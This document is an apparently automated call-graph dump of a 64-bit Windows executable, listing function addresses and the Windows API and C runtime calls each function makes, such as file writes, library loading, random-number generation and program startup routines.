7ff75424b67f 38364 7ff75424bc91 38362->38364 38365 7ff75424bbae 38362->38365 38366 7ff75424b6a5 38362->38366 38363->38319 38446 7ff754299b98 216 API calls 3 library calls 38363->38446 38364->38359 38367 7ff754262574 126 API calls 38364->38367 38368 7ff754278d00 48 API calls 38365->38368 38366->38359 38376 7ff75424b6b5 38366->38376 38389 7ff75424b79f 38366->38389 38367->38359 38370 7ff75424bc5c 38368->38370 38700 7ff754278d38 48 API calls 38370->38700 38374 7ff75424bc69 38701 7ff754278d38 48 API calls 38374->38701 38376->38359 38665 7ff754278d00 38376->38665 38378 7ff75424bc76 38702 7ff754278d38 48 API calls 38378->38702 38380 7ff75424bc84 38703 7ff754278d88 48 API calls 38380->38703 38385 7ff75424b726 38669 7ff754278d38 48 API calls 38385->38669 38387 7ff75424b733 38388 7ff75424b749 38387->38388 38670 7ff754278d88 48 API calls 38387->38670 38393 7ff75424b75c 38388->38393 38671 7ff754278d38 48 API calls 38388->38671 38396 7ff75424b8e5 38389->38396 38682 7ff75424c3c8 CharLowerW CharUpperW 38389->38682 38392 7ff75424b779 38672 7ff754278f94 38392->38672 38393->38392 38395 7ff754278d00 48 API calls 38393->38395 38395->38393 38683 7ff75428d840 WideCharToMultiByte 38396->38683 38400 7ff75424b9a1 38401 7ff754278d00 48 API calls 38400->38401 38403 7ff75424b9c4 38401->38403 38686 7ff754278d38 48 API calls 38403->38686 38405 7ff75424b910 38405->38400 38685 7ff75424945c 55 API calls _UnwindNestedFrames 38405->38685 38406 7ff75424b9d1 38687 7ff754278d38 48 API calls 38406->38687 38408 7ff75424b9de 38688 7ff754278d88 48 API calls 38408->38688 38410 7ff75424b9eb 38689 7ff754278d88 48 API calls 38410->38689 38412 7ff75424ba0b 38413 7ff754278d00 48 API calls 38412->38413 38414 7ff75424ba27 38413->38414 38690 7ff754278d88 48 API calls 38414->38690 38416 7ff75424ba37 38417 7ff75424ba49 38416->38417 38691 7ff75428bc48 15 API calls 38416->38691 38692 7ff754278d88 48 API calls 38417->38692 38420 7ff75424ba59 38421 7ff754278d00 48 API calls 38420->38421 38422 7ff75424ba66 38421->38422 38423 7ff754278d00 48 API calls 38422->38423 38424 7ff75424ba78 38423->38424 38693 7ff754278d38 48 API calls 38424->38693 38426 7ff75424ba85 38694 7ff754278d88 48 API calls 38426->38694 38428 7ff75424ba92 38429 7ff75424bacd 38428->38429 38695 7ff754278d88 48 API calls 38428->38695 38697 7ff754278e3c 38429->38697 38431 7ff75424bab2 38696 7ff754278d88 48 API calls 38431->38696 38434 7ff75424bb33 38436 7ff75424bb53 38434->38436 38439 7ff754278e3c 48 API calls 38434->38439 38440 7ff75424bb6e 38436->38440 38442 7ff754278e3c 48 API calls 38436->38442 38437 7ff754278d00 48 API calls 38441 7ff75424bb09 38437->38441 38438 7ff754278e3c 48 API calls 38438->38434 38439->38436 38443 7ff754278f94 126 API calls 38440->38443 38441->38434 38441->38438 38442->38440 38443->38359 38445->38312 38446->38319 38448 7ff754266396 38447->38448 38450 7ff7542663a0 38447->38450 38449 7ff75429a444 new 4 API calls 38448->38449 38449->38450 38450->38323 38452 7ff75429a44f 38451->38452 38453 7ff75429a47a 38452->38453 38454 7ff7542a36c0 new 2 API calls 38452->38454 38885 7ff75429b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38452->38885 38886 7ff75429b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38452->38886 38453->38336 38454->38452 38457->38325 38459 7ff75427993c 38458->38459 38460 7ff754279926 38458->38460 38462 7ff7542590b8 75 API calls 38459->38462 38461 7ff7542590b8 75 API calls 38460->38461 38463 7ff754279934 38461->38463 38462->38463 38463->38332 38464->38334 38467 7ff7542796a4 38465->38467 38466 7ff7542797d7 38467->38466 38468 7ff754262574 126 API calls 38467->38468 38470 7ff754299b98 216 API calls 38467->38470 38887 7ff754266498 72 API calls new 38467->38887 38468->38467 38470->38467 38471->38339 38473 7ff75425907e 38472->38473 38474 7ff754259057 CryptGenRandom CryptReleaseContext 38472->38474 38476 7ff754259c9c 11 API calls 38473->38476 38474->38473 38475 7ff754259089 38474->38475 38477 7ff754259c9c 38475->38477 38476->38475 38501 7ff75428c0a8 GetSystemTime SystemTimeToFileTime 38477->38501 38479 7ff754259cc5 38504 7ff7542a2d74 38479->38504 38483 7ff754259c49 38482->38483 38484 7ff754289d15 __BuildCatchObjectHelper 38482->38484 38486 7ff754289b70 38483->38486 38484->38483 38507 7ff754289d74 38484->38507 38488 7ff754289bd9 __scrt_fastfail 38486->38488 38490 7ff754289bad __scrt_fastfail 38486->38490 38487 7ff754289d74 8 API calls 38489 7ff754289c07 38487->38489 38488->38487 38489->38350 38490->38488 38491 7ff754289d74 8 API calls 38490->38491 38491->38488 38493 7ff75429a61a 38492->38493 38494 7ff75429a6a0 IsProcessorFeaturePresent 38493->38494 38495 7ff754259c86 38493->38495 38496 7ff75429a6b7 38494->38496 38495->38313 38511 7ff75429a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38496->38511 38498 7ff75429a6ca 38512 7ff75429a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38498->38512 38502 7ff75429a610 _UnwindNestedFrames 8 API calls 38501->38502 38503 7ff75428c0f1 38502->38503 38503->38479 38505 7ff754259cd7 38504->38505 38506 7ff7542a2d8b QueryPerformanceCounter 38504->38506 38505->38346 38506->38505 38508 7ff754289dbc 38507->38508 38508->38508 38509 7ff75429a610 _UnwindNestedFrames 8 API calls 38508->38509 38510 7ff754289f40 38509->38510 38510->38484 38511->38498 38514 7ff75424a4ea 38513->38514 38516 7ff75424a4ee 38514->38516 38704 7ff754262440 38514->38704 38516->38354 38518 7ff75424abbf pre_c_initialization 38517->38518 38519 7ff754278c1c 48 API calls 38518->38519 38520 7ff75424abf5 38519->38520 38521 7ff75424b4af 38520->38521 38526 7ff754259be0 14 API calls 38520->38526 38542 7ff75424aca7 38520->38542 38523 7ff75424b4ff 38521->38523 38527 7ff754262574 126 API calls 38521->38527 38522 7ff75424acbf 38524 7ff75424b35c 38522->38524 38525 7ff75424acc8 38522->38525 38733 7ff7542772c0 38523->38733 38529 7ff754278eec 48 API calls 38524->38529 38532 7ff75424acdd 38525->38532 38571 7ff75424aea7 38525->38571 38630 7ff75424ad60 38525->38630 38530 7ff75424ac34 38526->38530 38527->38523 38531 7ff75424b395 38529->38531 38533 7ff7542590b8 75 API calls 38530->38533 38534 7ff75424b3ad 38531->38534 38732 7ff754249e2c 48 API calls 38531->38732 38535 7ff75424ad68 38532->38535 38536 7ff75424ace6 38532->38536 38537 7ff75424ac8f 38533->38537 38541 7ff754278eec 48 API calls 38534->38541 38539 7ff754278eec 48 API calls 38535->38539 38536->38630 38714 7ff754278eec 38536->38714 38537->38542 38548 7ff754262574 126 API calls 38537->38548 38543 7ff75424ad9c 38539->38543 38540 7ff75429a610 _UnwindNestedFrames 8 API calls 38544 7ff75424b52b 38540->38544 38545 7ff75424b3d4 38541->38545 38542->38521 38542->38522 38549 7ff754278eec 48 API calls 38543->38549 38544->38359 38550 7ff75424b3e6 38545->38550 38553 7ff754278eec 48 API calls 38545->38553 38548->38542 38552 7ff75424ada9 38549->38552 38554 7ff754278eec 48 API calls 38550->38554 38551 7ff754278eec 48 API calls 38555 7ff75424ad31 38551->38555 38556 7ff754278eec 48 API calls 38552->38556 38553->38550 38557 7ff75424b451 38554->38557 38558 7ff754278eec 48 API calls 38555->38558 38559 7ff75424adb5 38556->38559 38560 7ff75424b471 38557->38560 38567 7ff754278eec 48 API calls 38557->38567 38561 7ff75424ad46 38558->38561 38562 7ff754278eec 48 API calls 38559->38562 38564 7ff75424b486 38560->38564 38568 7ff754278e3c 48 API calls 38560->38568 38563 7ff754278f94 126 API calls 38561->38563 38565 7ff75424adc2 38562->38565 38563->38630 38569 7ff754278f94 126 API calls 38564->38569 38566 7ff754278d00 48 API calls 38565->38566 38570 7ff75424adcf 38566->38570 38567->38560 38568->38564 38569->38630 38573 7ff7542590b8 75 API calls 38570->38573 38572 7ff75424afda 38571->38572 38722 7ff754249b64 48 API calls _UnwindNestedFrames 38571->38722 38583 7ff75424aff2 38572->38583 38723 7ff754249d98 48 API calls 38572->38723 38575 7ff75424ae22 38573->38575 38577 7ff754278e3c 48 API calls 38575->38577 38578 7ff75424ae33 38577->38578 38579 7ff754278e3c 48 API calls 38578->38579 38582 7ff75424ae48 38579->38582 38580 7ff75424b02b 38581 7ff75424b0af 38580->38581 38725 7ff75424a2c8 48 API calls 38580->38725 38585 7ff75424b0c8 38581->38585 38726 7ff75424a1a0 48 API calls 2 library calls 38581->38726 38590 7ff754289ce4 8 API calls 38582->38590 38583->38580 38724 7ff754249efc 48 API calls _UnwindNestedFrames 38583->38724 38588 7ff75424b0e2 38585->38588 38727 7ff75424a350 48 API calls _UnwindNestedFrames 38585->38727 38592 7ff754278eec 48 API calls 38588->38592 38591 7ff75424ae60 38590->38591 38594 7ff754289b70 8 API calls 38591->38594 38593 7ff75424b0fc 38592->38593 38595 7ff754278eec 48 API calls 38593->38595 38596 7ff75424ae6d 38594->38596 38597 7ff75424b109 38595->38597 38598 7ff754278e3c 48 API calls 38596->38598 38599 7ff75424b11f 38597->38599 38602 7ff754278eec 48 API calls 38597->38602 38600 7ff75424ae80 38598->38600 38718 7ff754278e94 38599->38718 38601 7ff754278f94 126 API calls 38600->38601 38601->38630 38602->38599 38605 7ff754278eec 48 API calls 38606 7ff75424b147 38605->38606 38607 7ff754278e94 48 API calls 38606->38607 38608 7ff75424b15f 38607->38608 38609 7ff754278eec 48 API calls 38608->38609 38612 7ff75424b16c 38609->38612 38610 7ff75424b18a 38611 7ff75424b1a9 38610->38611 38729 7ff754278d88 48 API calls 38610->38729 38614 7ff754278e94 48 API calls 38611->38614 38612->38610 38728 7ff754278d88 48 API calls 38612->38728 38616 7ff75424b1bc 38614->38616 38617 7ff754278eec 48 API calls 38616->38617 38618 7ff75424b1d6 38617->38618 38620 7ff75424b1e9 38618->38620 38730 7ff75424c3c8 CharLowerW CharUpperW 38618->38730 38620->38620 38621 7ff754278eec 48 API calls 38620->38621 38622 7ff75424b21f 38621->38622 38623 7ff754278e3c 48 API calls 38622->38623 38624 7ff75424b230 38623->38624 38625 7ff75424b247 38624->38625 38626 7ff754278e3c 48 API calls 38624->38626 38627 7ff754278f94 126 API calls 38625->38627 38626->38625 38628 7ff75424b278 38627->38628 38628->38630 38731 7ff7542770d8 4 API calls 2 library calls 38628->38731 38630->38540 38745 7ff754278f28 38631->38745 38634 7ff7542590b8 38635 7ff754259123 38634->38635 38647 7ff7542591a9 38634->38647 38635->38647 38763 7ff754287e74 38635->38763 38637 7ff75429a610 _UnwindNestedFrames 8 API calls 38639 7ff75424b66e 38637->38639 38650 7ff754262574 38639->38650 38640 7ff75428d840 WideCharToMultiByte 38641 7ff754259157 38640->38641 38642 7ff75425916a 38641->38642 38643 7ff7542591c4 38641->38643 38641->38647 38644 7ff7542591ab 38642->38644 38645 7ff75425916f 38642->38645 38782 7ff754259338 12 API calls _UnwindNestedFrames 38643->38782 38781 7ff75425951c 71 API calls _UnwindNestedFrames 38644->38781 38645->38647 38767 7ff7542598b0 38645->38767 38647->38637 38651 7ff7542625a5 38650->38651 38656 7ff75426259e 38650->38656 38652 7ff7542625ab GetStdHandle 38651->38652 38664 7ff7542625ba 38651->38664 38652->38664 38653 7ff754262619 WriteFile 38653->38664 38654 7ff7542625cf WriteFile 38655 7ff75426260b 38654->38655 38654->38664 38655->38654 38655->38664 38656->38362 38657 7ff754262658 GetLastError 38657->38664 38659 7ff754262684 SetLastError 38659->38664 38662 7ff754262721 38882 7ff75425cf14 10 API calls 38662->38882 38664->38653 38664->38654 38664->38656 38664->38657 38664->38662 38879 7ff754263144 9 API calls 2 library calls 38664->38879 38880 7ff75425cf34 10 API calls 38664->38880 38881 7ff75425c95c 126 API calls 38664->38881 38666 7ff75424161c 48 API calls 38665->38666 38667 7ff75424b719 38666->38667 38668 7ff754278d38 48 API calls 38667->38668 38668->38385 38669->38387 38670->38388 38671->38393 38673 7ff754279131 38672->38673 38674 7ff754278fcf 38672->38674 38673->38359 38676 7ff75427905d 38674->38676 38883 7ff75425ca6c 48 API calls 3 library calls 38674->38883 38675 7ff7542790e0 38675->38673 38678 7ff754262574 126 API calls 38675->38678 38676->38675 38677 7ff75424161c 48 API calls 38676->38677 38677->38675 38678->38673 38680 7ff75427904c 38884 7ff75425ca40 61 API calls _CxxThrowException 38680->38884 38682->38396 38684 7ff75424b8f8 CharToOemA 38683->38684 38684->38405 38685->38400 38686->38406 38687->38408 38688->38410 38689->38412 38690->38416 38691->38417 38692->38420 38693->38426 38694->38428 38695->38431 38696->38429 38698 7ff75424161c 48 API calls 38697->38698 38699 7ff75424baf2 38698->38699 38699->38434 38699->38437 38699->38441 38700->38374 38701->38378 38702->38380 38703->38364 38705 7ff75426246a SetFilePointer 38704->38705 38706 7ff754262454 38704->38706 38707 7ff7542624ad 38705->38707 38708 7ff75426248d GetLastError 38705->38708 38706->38707 38712 7ff75425cd00 10 API calls 38706->38712 38707->38516 38708->38707 38710 7ff754262497 38708->38710 38710->38707 38713 7ff75425cd00 10 API calls 38710->38713 38715 7ff754278efc 38714->38715 38716 7ff754278d00 48 API calls 38715->38716 38717 7ff75424ad24 38715->38717 38716->38715 38717->38551 38720 7ff754278eac 38718->38720 38719 7ff754278d00 48 API calls 38719->38720 38720->38719 38721 7ff75424b137 38720->38721 38721->38605 38722->38572 38723->38583 38724->38580 38725->38581 38726->38585 38727->38588 38728->38610 38729->38611 38730->38620 38731->38630 38732->38534 38734 7ff7542772dd 38733->38734 38735 7ff754277304 38734->38735 38737 7ff75429a480 38734->38737 38735->38630 38738 7ff75429a444 38737->38738 38739 7ff75429a47a 38738->38739 38740 7ff7542a36c0 new 2 API calls 38738->38740 38743 7ff75429b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38738->38743 38744 7ff75429b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38738->38744 38739->38735 38740->38738 38748 7ff75424161c 38745->38748 38747 7ff75424b601 38747->38362 38747->38364 38747->38634 38749 7ff754241640 38748->38749 38758 7ff7542416aa __BuildCatchObjectHelper 38748->38758 38750 7ff75424166d 38749->38750 38759 7ff75425ca6c 48 API calls 3 library calls 38749->38759 38753 7ff7542416d4 38750->38753 38754 7ff75424168e 38750->38754 38752 7ff754241661 38760 7ff75425cb64 8 API calls 38752->38760 38753->38758 38762 7ff75425cb64 8 API calls 38753->38762 38754->38758 38761 7ff75425cb64 8 API calls 38754->38761 38758->38747 38759->38752 38764 7ff754259143 38763->38764 38765 7ff754287e95 38763->38765 38764->38640 38783 7ff754287ec8 38765->38783 38771 7ff754259920 38767->38771 38778 7ff754259b45 38767->38778 38768 7ff75429a610 _UnwindNestedFrames 8 API calls 38769 7ff754259b61 38768->38769 38769->38647 38772 7ff75425996d 38771->38772 38773 7ff754259b75 38771->38773 38815 7ff754287da8 38771->38815 38772->38772 38822 7ff75425a0f4 38772->38822 38774 7ff754287f24 68 API calls 38773->38774 38777 7ff754259acb 38774->38777 38776 7ff7542599d0 38776->38776 38838 7ff754287f24 38776->38838 38777->38777 38777->38778 38852 7ff754284ea8 8 API calls _UnwindNestedFrames 38777->38852 38778->38768 38781->38647 38782->38647 38784 7ff754287efa __BuildCatchObjectHelper 38783->38784 38790 7ff754287fb5 38784->38790 38797 7ff75428b3f0 38784->38797 38786 7ff75428805c GetCurrentProcessId 38788 7ff754288034 38786->38788 38788->38764 38789 7ff754287f7e GetProcAddressForCaller GetProcAddress 38789->38790 38790->38786 38791 7ff754287ff1 38790->38791 38791->38788 38806 7ff75425ca6c 48 API calls 3 library calls 38791->38806 38793 7ff75428801f 38807 7ff75425cda4 10 API calls 2 library calls 38793->38807 38795 7ff754288027 38808 7ff75425ca40 61 API calls _CxxThrowException 38795->38808 38809 7ff75429a5a0 38797->38809 38800 7ff75428b428 38804 7ff75429a610 _UnwindNestedFrames 8 API calls 38800->38804 38801 7ff75428b42c 38811 7ff7542748bc 38801->38811 38805 7ff754287f72 38804->38805 38805->38789 38805->38790 38806->38793 38807->38795 38808->38788 38810 7ff75428b3fc GetSystemDirectoryW 38809->38810 38810->38800 38810->38801 38812 7ff7542748cb pre_c_initialization 38811->38812 38813 7ff75429a610 _UnwindNestedFrames 8 API calls 38812->38813 38814 7ff75427493a LoadLibraryExW 38813->38814 38814->38800 38816 7ff754287e74 68 API calls 38815->38816 38817 7ff754287ddc 38816->38817 38818 7ff754287e74 68 API calls 38817->38818 38819 7ff754287def 38818->38819 38820 7ff75429a610 _UnwindNestedFrames 8 API calls 38819->38820 38821 7ff754287e43 38820->38821 38821->38771 38825 7ff75425a15c __BuildCatchObjectHelper 38822->38825 38823 7ff75425a358 38875 7ff75429a774 8 API calls __report_securityfailure 38823->38875 38825->38823 38826 7ff75425a352 38825->38826 38829 7ff75425a34d 38825->38829 38830 7ff75425a192 38825->38830 38874 7ff75429a774 8 API calls __report_securityfailure 38826->38874 38828 7ff75425a35e 38873 7ff75429a774 8 API calls __report_securityfailure 38829->38873 38853 7ff754259dd8 38830->38853 38833 7ff75425a1d9 38834 7ff754259dd8 8 API calls 38833->38834 38835 7ff75425a2f1 38833->38835 38834->38833 38836 7ff75429a610 _UnwindNestedFrames 8 API calls 38835->38836 38837 7ff75425a33b 38836->38837 38837->38776 38839 7ff754287f5e 38838->38839 38845 7ff754287fb5 38838->38845 38840 7ff75428b3f0 10 API calls 38839->38840 38839->38845 38842 7ff754287f72 38840->38842 38841 7ff75428805c GetCurrentProcessId 38843 7ff754288034 38841->38843 38844 7ff754287f7e GetProcAddressForCaller GetProcAddress 38842->38844 38842->38845 38843->38777 38844->38845 38845->38841 38846 7ff754287ff1 38845->38846 38846->38843 38876 7ff75425ca6c 48 API calls 3 library calls 38846->38876 38848 7ff75428801f 38877 7ff75425cda4 10 API calls 2 library calls 38848->38877 38850 7ff754288027 38878 7ff75425ca40 61 API calls _CxxThrowException 38850->38878 38852->38778 38854 7ff754259e46 38853->38854 38860 7ff754259e6e __scrt_fastfail 38853->38860 38855 7ff754289ce4 8 API calls 38854->38855 38856 7ff754259e5e 38855->38856 38857 7ff754289b70 8 API calls 38856->38857 38857->38860 38858 7ff754259e85 38859 7ff754289ce4 8 API calls 38858->38859 38862 7ff754259f97 38859->38862 38860->38858 38861 7ff754289ce4 8 API calls 38860->38861 38861->38858 38863 7ff754289b70 8 API calls 38862->38863 38864 7ff754259fa8 __scrt_fastfail 38863->38864 38865 7ff754259fb4 38864->38865 38867 7ff754289ce4 8 API calls 38864->38867 38866 7ff754289ce4 8 API calls 38865->38866 38868 7ff75425a0bb 38866->38868 38867->38865 38869 7ff754289b70 8 API calls 38868->38869 38870 7ff75425a0c9 38869->38870 38871 7ff75429a610 _UnwindNestedFrames 8 API calls 38870->38871 38872 7ff75425a0d8 38871->38872 38872->38833 38873->38826 38874->38823 38875->38828 38876->38848 38877->38850 38878->38843 38879->38659 38881->38664 38883->38680 38884->38676 38887->38467 38888 7ff754243e71 38889 7ff754243e81 38888->38889 38891 7ff754243e89 38888->38891 38899 7ff754299a14 49 API calls 38889->38899 38892 7ff754243edd 38891->38892 38893 7ff754243ea3 38891->38893 38895 7ff75429a610 _UnwindNestedFrames 8 API calls 38892->38895 38900 7ff75426331c 48 API calls 2 library calls 38893->38900 38897 7ff754243eef 38895->38897 38896 7ff754243eab 38896->38892 38901 7ff7542463e8 8 API calls 2 library calls 38896->38901 38899->38891 38900->38896 38901->38892 38902 7ff7542a231c 38903 7ff7542a2342 GetModuleHandleW 38902->38903 38904 7ff7542a238c 38902->38904 38903->38904 38908 7ff7542a234f 38903->38908 38915 7ff7542a6938 EnterCriticalSection 38904->38915 38906 7ff7542a6998 fflush LeaveCriticalSection 38907 7ff7542a2460 38906->38907 38910 7ff7542a246c 38907->38910 38914 7ff7542a2488 11 API calls 38907->38914 38908->38904 38916 7ff7542a24d4 GetModuleHandleExW 38908->38916 38909 7ff7542a2410 38909->38906 38911 7ff7542a43b8 16 API calls 38911->38909 38913 7ff7542a2396 38913->38909 38913->38911 38914->38910 38917 7ff7542a2525 38916->38917 38918 7ff7542a24fe GetProcAddress 38916->38918 38919 7ff7542a252f FreeLibrary 38917->38919 38920 7ff7542a2535 38917->38920 38918->38917 38921 7ff7542a2518 38918->38921 38919->38920 38920->38904 38921->38917 38922 7ff75429b0fc 38941 7ff75429aa8c 38922->38941 38926 7ff75429b148 38931 7ff75429b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38926->38931 38949 7ff7542a472c 38926->38949 38927 7ff75429b123 __scrt_acquire_startup_lock 38927->38926 38997 7ff75429b52c 7 API calls __scrt_fastfail 38927->38997 38930 7ff75429b16d 38931->38930 38932 7ff75429b1f7 38931->38932 38998 7ff7542a2574 35 API calls __FrameUnwindToState 38931->38998 38953 7ff7542a3fc4 38932->38953 38939 7ff75429b220 38999 7ff75429ac64 8 API calls 2 library calls 38939->38999 38942 7ff75429aaae __isa_available_init 38941->38942 39000 7ff75429e2f8 38942->39000 38948 7ff75429aab7 38948->38927 38996 7ff75429b52c 7 API calls __scrt_fastfail 38948->38996 38951 7ff7542a4744 38949->38951 38950 7ff7542a4766 38950->38931 38951->38950 39049 7ff75429b010 38951->39049 38954 7ff75429b20c 38953->38954 38955 7ff7542a3fd4 38953->38955 38957 7ff754277e20 38954->38957 39134 7ff7542a3c84 38955->39134 39166 7ff75428b470 GetModuleHandleW 38957->39166 38963 7ff754277e58 SetErrorMode GetModuleHandleW 38964 7ff7542848cc 21 API calls 38963->38964 38965 7ff754277e7d 38964->38965 38966 7ff754283e48 137 API calls 38965->38966 38967 7ff754277e90 38966->38967 38968 7ff754253d3c 126 API calls 38967->38968 38969 7ff754277e9c 38968->38969 38970 7ff75429a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38969->38970 38971 7ff754277ead 38970->38971 38972 7ff754277ebf 38971->38972 38973 7ff754253f18 70 API calls 38971->38973 38974 7ff754254d1c 157 API calls 38972->38974 38973->38972 38975 7ff754277ed6 38974->38975 38976 7ff754277eef 38975->38976 38977 7ff754256ad0 154 API calls 38975->38977 38978 7ff754254d1c 157 API calls 38976->38978 38979 7ff754277ee7 38977->38979 38980 7ff754277eff 38978->38980 38981 7ff754254e48 160 API calls 38979->38981 38982 7ff754277f0d 38980->38982 38984 7ff754277f14 38980->38984 38981->38976 38983 7ff75428b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38982->38983 38983->38984 38985 7ff754254888 58 API calls 38984->38985 38986 7ff754277f57 38985->38986 38987 7ff754254fd0 268 API calls 38986->38987 38989 7ff754277f5f 38987->38989 38988 7ff754277f9e 38994 7ff75429b684 GetModuleHandleW 38988->38994 38989->38988 38990 7ff754277f8c 38989->38990 38991 7ff75428b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38990->38991 38992 7ff754277f93 38991->38992 38992->38988 38993 7ff75428b57c 14 API calls 38992->38993 38993->38988 38995 7ff75429b698 38994->38995 38995->38939 38996->38927 38997->38926 38998->38932 38999->38930 39001 7ff75429e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39000->39001 39013 7ff75429eb08 39001->39013 39005 7ff75429aab3 39005->38948 39008 7ff7542a45e4 39005->39008 39006 7ff75429e318 39006->39005 39020 7ff75429eb50 DeleteCriticalSection 39006->39020 39009 7ff7542a9d4c 39008->39009 39010 7ff75429aac0 39009->39010 39037 7ff7542a66c0 39009->39037 39010->38948 39012 7ff75429e32c 8 API calls 3 library calls 39010->39012 39012->38948 39014 7ff75429eb10 39013->39014 39016 7ff75429eb41 39014->39016 39018 7ff75429e30b 39014->39018 39021 7ff75429e678 39014->39021 39026 7ff75429eb50 DeleteCriticalSection 39016->39026 39018->39005 39019 7ff75429e8a4 8 API calls 3 library calls 39018->39019 39019->39006 39020->39005 39027 7ff75429e34c 39021->39027 39024 7ff75429e6cf InitializeCriticalSectionAndSpinCount 39025 7ff75429e6bb 39024->39025 39025->39014 39026->39018 39028 7ff75429e3b2 39027->39028 39034 7ff75429e3ad 39027->39034 39028->39024 39028->39025 39029 7ff75429e47a 39029->39028 39031 7ff75429e489 GetProcAddress 39029->39031 39030 7ff75429e3e5 LoadLibraryExW 39032 7ff75429e40b GetLastError 39030->39032 39030->39034 39031->39028 39033 7ff75429e4a1 39031->39033 39032->39034 39035 7ff75429e416 LoadLibraryExW 39032->39035 39033->39028 39034->39028 39034->39029 39034->39030 39036 7ff75429e458 FreeLibrary 39034->39036 39035->39034 39036->39034 39048 7ff7542a6938 EnterCriticalSection 39037->39048 39039 7ff7542a66d0 39040 7ff7542a8050 32 API calls 39039->39040 39042 7ff7542a66d9 39040->39042 39041 7ff7542a66e7 39044 7ff7542a6998 fflush LeaveCriticalSection 39041->39044 39042->39041 39043 7ff7542a64d0 34 API calls 39042->39043 39045 7ff7542a66e2 39043->39045 39046 7ff7542a66f3 39044->39046 39047 7ff7542a65bc GetStdHandle GetFileType 39045->39047 39046->39009 39047->39041 39050 7ff75429b020 pre_c_initialization 39049->39050 39070 7ff7542a2b00 39050->39070 39052 7ff75429b02c pre_c_initialization 39076 7ff75429aad8 39052->39076 39054 7ff75429b045 39055 7ff75429b0b5 39054->39055 39056 7ff75429b049 _RTC_Initialize 39054->39056 39113 7ff75429b52c 7 API calls __scrt_fastfail 39055->39113 39081 7ff75429ace0 39056->39081 39058 7ff75429b0bf 39114 7ff75429b52c 7 API calls __scrt_fastfail 39058->39114 39061 7ff75429b05a pre_c_initialization 39084 7ff7542a3b0c 39061->39084 39062 7ff75429b0ca __scrt_initialize_default_local_stdio_options 39062->38951 39065 7ff75429b06a 39112 7ff75429b7dc RtlInitializeSListHead 39065->39112 39067 7ff75429b06f pre_c_initialization 39068 7ff7542a4818 pre_c_initialization 35 API calls 39067->39068 39069 7ff75429b09a pre_c_initialization 39068->39069 39069->38951 39071 7ff7542a2b11 39070->39071 39072 7ff7542a2b19 39071->39072 39115 7ff7542a4f3c 15 API calls setbuf 39071->39115 39072->39052 39074 7ff7542a2b28 39116 7ff7542a4e1c 31 API calls _invalid_parameter_noinfo 39074->39116 39077 7ff75429ab96 39076->39077 39080 7ff75429aaf0 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 39076->39080 39117 7ff75429b52c 7 API calls __scrt_fastfail 39077->39117 39079 7ff75429aba0 39080->39054 39118 7ff75429ac90 39081->39118 39083 7ff75429ace9 39083->39061 39085 7ff7542a3b40 39084->39085 39086 7ff7542a3b2a 39084->39086 39125 7ff7542a9370 39085->39125 39123 7ff7542a4f3c 15 API calls setbuf 39086->39123 39089 7ff7542a3b2f 39124 7ff7542a4e1c 31 API calls _invalid_parameter_noinfo 39089->39124 39092 7ff7542a3b72 39129 7ff7542a38ec 35 API calls pre_c_initialization 39092->39129 39093 7ff75429b066 39093->39058 39093->39065 39095 7ff7542a3b9c 39130 7ff7542a3aa8 15 API calls __vcrt_getptd_noexit 39095->39130 39097 7ff7542a3bb2 39098 7ff7542a3bba 39097->39098 39099 7ff7542a3bcb 39097->39099 39131 7ff7542a4f3c 15 API calls setbuf 39098->39131 39132 7ff7542a38ec 35 API calls pre_c_initialization 39099->39132 39102 7ff7542a3bbf 39104 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 39102->39104 39103 7ff7542a3be7 39103->39102 39105 7ff7542a3c30 39103->39105 39106 7ff7542a3c17 39103->39106 39104->39093 39109 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 39105->39109 39107 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 39106->39107 39108 7ff7542a3c20 39107->39108 39110 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 39108->39110 39109->39102 39111 7ff7542a3c2c 39110->39111 39111->39093 39113->39058 39114->39062 39115->39074 39116->39072 39117->39079 39119 7ff75429acbf 39118->39119 39121 7ff75429acb5 _onexit 39118->39121 39122 7ff7542a4434 34 API calls _onexit 39119->39122 39121->39083 39122->39121 39123->39089 39124->39093 39126 7ff7542a937d 39125->39126 39128 7ff7542a3b45 GetModuleFileNameA 39125->39128 39133 7ff7542a91b0 48 API calls 5 library calls 39126->39133 39128->39092 39129->39095 39130->39097 39131->39102 39132->39103 39133->39128 39135 7ff7542a3c98 39134->39135 39139 7ff7542a3ca1 39134->39139 39135->39139 39140 7ff7542a3ccc 39135->39140 39139->38954 39141 7ff7542a3ce5 39140->39141 39149 7ff7542a3caa 39140->39149 39142 7ff7542a9370 pre_c_initialization 48 API calls 39141->39142 39143 7ff7542a3cea 39142->39143 39153 7ff7542a978c GetEnvironmentStringsW 39143->39153 39146 7ff7542a3cf7 39148 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 39146->39148 39148->39149 39149->39139 39152 7ff7542a3e78 17 API calls __vcrt_getptd_noexit 39149->39152 39150 7ff7542a3d04 39151 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 39150->39151 39151->39146 39152->39139 39155 7ff7542a97ba WideCharToMultiByte 39153->39155 39164 7ff7542a985e 39153->39164 39158 7ff7542a9814 39155->39158 39155->39164 39156 7ff7542a3cef 39156->39146 39165 7ff7542a3d38 31 API calls 3 library calls 39156->39165 39157 7ff7542a9868 FreeEnvironmentStringsW 39157->39156 39159 7ff7542a4ab4 setbuf 16 API calls 39158->39159 39160 7ff7542a981c 39159->39160 39161 7ff7542a984b 39160->39161 39162 7ff7542a9824 WideCharToMultiByte 39160->39162 39163 7ff7542a4a74 __vcrt_getptd_noexit 15 API calls 